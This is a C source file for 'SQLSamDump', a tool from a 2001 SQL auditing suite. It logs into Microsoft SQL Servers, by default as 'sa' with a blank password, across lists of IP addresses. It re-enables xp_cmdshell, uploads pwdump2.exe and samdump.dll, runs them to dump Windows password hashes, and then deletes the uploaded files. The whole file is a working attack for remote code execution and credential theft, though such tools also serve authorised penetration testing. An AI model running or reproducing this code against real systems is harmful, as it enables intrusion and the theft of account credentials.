/* 
   SQL Auditing Tools
   Copyright (C) Patrik Karlsson 2001
   
   This program is free software; you can redistribute it and/or modify
   it under the terms of the GNU General Public License as published by
   the Free Software Foundation; either version 2 of the License, or
   (at your option) any later version.
   
   This program is distributed in the hope that it will be useful,
   but WITHOUT ANY WARRANTY; without even the implied warranty of
   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
   GNU General Public License for more details.
   
   You should have received a copy of the GNU General Public License
   along with this program; if not, write to the Free Software
   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
*/

#include <tds.h>
#include <tdsconvert.h>
#include "sqlsamdump.h"
#include "sqllib.h"
#include "util.h"
#include "constants.h"
#include <getopt.h>
#include <string.h>
#include <unistd.h>

/*
  Set a few default values
*/
TDSLOGIN *set_target_defaults(TDSLOGIN *login) {

  login = tds_alloc_login();
  tds_set_passwd(login, "");
  tds_set_user(login, "sa");
  tds_set_app(login, "Microsoft Access");
  tds_set_host(login, "xxx");
  tds_set_library(login,"TDS-Library");
  tds_set_client_charset(login,"iso_1");
  tds_set_language(login, "us_english");
  tds_set_server(login, "");
  tds_set_packet(login, 512);
  tds_set_port(login, 1433);

  return login;

}

/*
  Output usage for l00sers
*/
void usage(char **argv) {

  printf("\tSQLSAMDUMP %s by patrik@cqure.net\n", 
	 SQLTOOLS_VERSION);
  printf("\t-------------------------------------\n");
  printf("\tusage: %s [options]\n\n", argv[0]);
  printf("\t\t-i* <ipaddress>|<ipfile> to probe\n");
  printf("\t\t-t port (default 1433)\n");
  printf("\t\t-u username\n");
  printf("\t\t-p password\n");
  printf("\t\t-P path to pwdump executables (default current dir)\n");
  printf("\t\t-T path to tempdir if not autodetected\n");
  printf("\t\t-r create report (<ip>.txt)\n");
  printf("\t\t-h this\n");
  printf("\t\t-v verbose\n\n");
  
}

int hackSQLServer(struct args_struct args) {
  
  char *pDirs[7] = {"c:\\temp", "c:\\winnt\\temp", "d:\\temp", 
		    "e:\\temp", "c:\\", "d:\\", "e:\\"};
  int i, nDirCount = 6;
  TDSLOGIN *login = NULL;
  TDSSOCKET *tds;
  TDSCONTEXT *context;
  char sTMP[256];
  FILE *pRepFD = NULL;
  char repfile[128];
  char bLooser = 0;
  char *sPwdumpExe;
  char *sPwdumpDll;
  const char* p;

  if ((sPwdumpExe = (char *)malloc(strlen(args.sPwdumpPath) + 12)) == NULL) {
    fprintf(stderr,"sqlsamdump: Error allocating sPwdumpExe\n");
    exit(1);
  }

  if ((sPwdumpDll = (char *)malloc(strlen(args.sPwdumpPath) + 12)) == NULL) {
    fprintf(stderr,"sqlsamdump: Error allocating sPwdumpDll\n");
    exit(1);
  }

  memset(sTMP, 0, sizeof(sTMP));
  memset(sPwdumpExe,'\0',sizeof(sPwdumpExe));
  memset(sPwdumpDll,'\0',sizeof(sPwdumpDll));

  strncpy(sPwdumpExe,args.sPwdumpPath,strlen(args.sPwdumpPath));
  strncpy(sPwdumpDll,args.sPwdumpPath,strlen(args.sPwdumpPath));

  strcat(sPwdumpExe, "pwdump2.exe");
  strcat(sPwdumpDll, "samdump.dll");

  if (!fileExist(sPwdumpExe) || ! fileExist(sPwdumpDll)) {
    fprintf(stderr,"Error: Could not find %s or %s\n",sPwdumpExe,sPwdumpDll);
    exit(1);
  }

  fprintf(stderr,"pwdump : %s\n", sPwdumpExe);
  if (sPwdumpDll != NULL)
    fprintf(stderr,"dll file : %s\n", sPwdumpDll);

  login = set_target_defaults(login);

  /* no username supplied, assuming sa */
  if ( strlen(args.sUser) == 0 )
    strcpy(args.sUser, "sa");

  tds_set_server(login, args.sIP);
  tds_set_passwd(login, args.sPass);
  tds_set_user(login, args.sUser);
  tds_set_port(login, args.nPort);
  if (args.sUser && (p=strchr(args.sUser,'\\')) == NULL) {
      tds_set_version(login,(short) 4,(short) 2);
  }
      

  /* should we create a report ? */
  if ( args.bReport ) {

    /* be verbose ? */
    if ( args.verbose)
      printf("-- Creating report --\n");
    
    /* create <ip>.txt */
    memset(repfile, 0, sizeof(repfile));
    strcpy(sTMP, args.sIP);
    sprintf(repfile, "%s.txt", strrep(sTMP, '.', '_'));

    if ( ( pRepFD = fopen(repfile, "w") ) == NULL ) {
      fprintf(stderr, "ERROR: Creating report file\n");
      exit(1);
    }

  }
    
  if ( args.verbose )
    printf("-- Logging in to %s --\n", args.sIP);

  context = tds_alloc_context();
  if( context->locale && !context->locale->date_fmt ) {
      /* set default in case there's no locale file */
      context->locale->date_fmt = strdup("%b %e %Y %l:%M%p");
  }

  tds = tds_alloc_socket(context, 512);
  tds_set_parent(tds, NULL);
  connect_info = tds_read_config_info(NULL, login, context->locale);
  if( (!connect_info || tds_connect(tds,connect_info)) != TDS_FAIL ) {
      tds_free_connect(connect_info);

    if ( !ifExistsXP(tds, "xp_cmdshell") ) {
      fprintf(stderr, "WARNING: could not find xp_cmdshell\n");
      fprintf(stderr, "INFO: Trying to add xp_cmdshell\n");

      if ( sp_addextendedproc(tds, "xp_cmdshell", "xpsql70.dll") )
	fprintf(stderr, "INFO: Added xp_cmdshell\n");
      else {
	fprintf(stderr, "WARNING: Failed to add xp_cmdshell\n");
	sqlExec(tds, "drop procedure xp_cmdshell\n");
      }

      bLooser = 1;

    }

    dropHaxorTable(tds);

    /* no path supplied, try to find one */
    if ( strlen(args.sTempPath) == 0 ) {

      if ( args.verbose )
	printf("-- Searching for temp path --\n");

      for ( i=0; i<nDirCount; i++ ) {
	if ( dirExists(tds, pDirs[i]) )
	  strcpy(args.sTempPath, pDirs[i]);
      }

      /* no exploitdir found */
      if ( strlen(args.sTempPath) == 0 ) {
	tds_free_login(login);
	fprintf(stderr, "ERROR: No temp path found\n");
	return FALSE;
      }

    }
    else {
      if ( !dirExists(tds, args.sTempPath) ) {
        tds_free_connect(connect_info);
	tds_free_login(login);
	fprintf(stderr, "ERROR: The temp path was not found\n");
	return FALSE;
      }
    }

    if ( !createHaxorTable(tds) )
      printf("Error creating haxortable!\n");

    if (args.verbose)
      printf("-- Uploading %s --\n",sPwdumpExe);
	  
    if (uploadFile(tds,"pwdump2.exe","pwdump2.exe",args.sTempPath)!= TRUE)
       fprintf(stderr,"Error uploading %s!\n",sPwdumpExe);

    if ( !dropHaxorTable(tds) ) {
      printf("Error dropping haxortable!\n");
      return FALSE;
    }

    if ( !createHaxorTable(tds) )
      printf("Error creating haxortable!\n");

    if ( args.verbose )
      printf("-- Uploading %s --\n", sPwdumpDll);

    if ( uploadFile(tds, "samdump.dll", "samdump.dll", args.sTempPath) != TRUE )
      printf("Error uploading file %s!\n",sPwdumpDll);
    
    if ( args.verbose )
      printf("-- Running %s --\n", sPwdumpExe);
    
    sprintf(sTMP, "xp_cmdshell '%s\\pwdump2.exe'", args.sTempPath);
    sleep(1);

    if ( args.bReport ) {
      sqlGetResult(pRepFD, tds, sTMP, 0);
      fclose(pRepFD);
    }
    else
      sqlGetResult(stdout, tds, sTMP, 0);

  }
  else {
    fprintf(stderr, "ERROR: Login failed ...\n");
    return FALSE;
  } /* end if connect */

  if ( args.verbose )
    printf("-- Cleaning up --\n");

  sprintf(sTMP, "xp_cmdshell 'del %s\\pwdump2.exe'", args.sTempPath);
  sqlExec(tds, sTMP);
  sprintf(sTMP, "xp_cmdshell 'del %s\\samdump.dll'", args.sTempPath);
  sqlExec(tds, sTMP);
  sprintf(sTMP, "xp_cmdshell 'del %s\\bcp.fmt'", args.sTempPath);
  sqlExec(tds, sTMP);

  if ( !dropHaxorTable(tds) )
    fprintf(stderr, "ERROR: Dropping haxortable ...\n");

  /* Should we drop the xp_cmdshell ? */
  if ( bLooser )
    sqlExec(tds, "drop procedure xp_cmdshell");

  tds_free_login(login);

  return TRUE;

}

void initArguments(struct args_struct *pArgs) {

  pArgs->verbose = FALSE;
  memset(pArgs->sIP, 0, sizeof(pArgs->sIP));
  pArgs->nPort = 1433;
  memset(pArgs->sUser, 0, sizeof(pArgs->sUser));
  memset(pArgs->sPass, 0, sizeof(pArgs->sPass));
  memset(pArgs->sTempPath, 0, sizeof(pArgs->sTempPath));
  memset(pArgs->sPwdumpPath, 0, sizeof(pArgs->sPwdumpPath));
  memset(pArgs->sPwdumpVer, 0, sizeof(pArgs->sPwdumpVer));
  pArgs->bReport = FALSE;
  pArgs->pIPFile = NULL;

}

/*
  MAIN
*/
int main(int argc, char **argv) {

  struct args_struct args;
  int c = 0;
  char *sIP;

  if ((sIP = (char *)malloc(25)) == NULL){
    fprintf(stderr,"sqlsamdump: cannot malloc sIP\n");
    exit(1);
  }
  memset(sIP,'\0',sizeof(sIP));
  initArguments(&args);

  /* Set the default version to use to 2 and PwdumpPath to the current dir*/
  strncpy(args.sPwdumpVer, "2", strlen("2"));
  strncpy(args.sPwdumpPath, "./", strlen("./"));

  while (1) {

    c = getopt (argc, argv, "i:u:p:vT:t:P:V:rh");

    if ( c == -1 ) 
      break;

    switch (c) {
      
    case 'i':
      
      if ( ( args.pIPFile = fopen(optarg, "r") ) == NULL ) {
	  if ( strlen(optarg) <= sizeof(args.sIP) ) {
	      strncpy(args.sIP, optarg, strlen(optarg));
	} else {
	  usage(argv);
	  exit(1);
	}
      }

      break;

    case 'u':
      strncpy(args.sUser, optarg, strlen(optarg));
      break;

    case 'P':
      strncpy(args.sPwdumpPath, optarg, strlen(optarg));
      strncat(args.sPwdumpPath, "/", strlen("/"));
      break;

    case 'V':
      strncpy(args.sPwdumpVer, optarg, strlen(optarg));
      break;

    case 'h':
      usage(argv);
      exit(1);
      break;

    case 'p':
      strncpy(args.sPass, optarg, strlen(optarg));
      break;

    case 'v':
      args.verbose = TRUE;
      break;

    case 't':
      args.nPort = atoi(optarg);
      break;

    case 'T':
      strcpy(args.sTempPath, optarg);
      break;

    case 'r':
      args.bReport = TRUE;
      break;

    default:
      usage(argv);
      exit(1);
    }

  }

  /* check for needed params */
  if ( strlen(args.sIP) == 0 && args.pIPFile == NULL ) {
    usage(argv);
    exit(1);
  }

  fprintf(stdout, "SQLSamDump by Patrik Karlsson "
	  "<patrik@cqure.net>\n");

  /* do we have an IP file ? */
  if ( args.pIPFile != NULL ) {
    while ( fgets(args.sIP, sizeof(args.sIP), args.pIPFile)  != NULL ) {
	if ( args.sIP[strlen(args.sIP)-1] == '\n' )
	    args.sIP[strlen(args.sIP)-1] = 0;

	hackSQLServer(args);
    }

  } else {
    hackSQLServer(args);
  }
    return TRUE;

}
